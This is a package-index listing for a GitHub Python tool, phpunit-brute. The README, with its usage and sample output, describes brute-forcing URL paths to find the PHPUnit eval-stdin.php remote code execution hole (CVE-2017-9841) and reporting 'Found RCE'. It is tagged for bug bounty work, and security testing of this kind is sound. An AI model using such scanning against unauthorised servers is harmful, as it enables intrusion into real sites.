Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/phpunit-brute
Tool to try multiple paths for PHPunit RCE CVE-2017-9841
https://github.com/randomrobbiebf/phpunit-brute
bugbounty cve-2017-9841 phpunit
Last synced: about 1 month ago
JSON representation
Tool to try multiple paths for PHPunit RCE CVE-2017-9841
- Host: GitHub
- URL: https://github.com/randomrobbiebf/phpunit-brute
- Owner: RandomRobbieBF
- Created: 2020-05-18T20:55:05.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2021-10-18T09:23:05.000Z (about 3 years ago)
- Last Synced: 2023-02-26T09:23:44.353Z (almost 2 years ago)
- Topics: bugbounty, cve-2017-9841, phpunit
- Language: Python
- Homepage:
- Size: 10.7 KB
- Stars: 25
- Watchers: 2
- Forks: 20
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# phpunit-brute
Tool to try multiple paths for PHPunit RCE (CVE-2017-9841) and it will log found paths to found.txt in the dir.
It uses the following list of paths `https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt`
if you have a path that is not on there please submit a PR
```
usage: phpunit-brute.py [-h] -u URL [-p PROXY]
phpunit-brute.py: error: the following arguments are required: -u/--url
```Example
---```
python3 phpunit-brute.py -u http://someoldwebsite.com[-] No Luck for /_inc/vendor/stripe/stripe-php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /_staff/cron/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /_staff/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/Laravel E2N test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/Laravel%20E2N%20test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /172410101040/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /1board/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /20170811125232/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[+] Found RCE for http://someoldwebsite.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [+]
```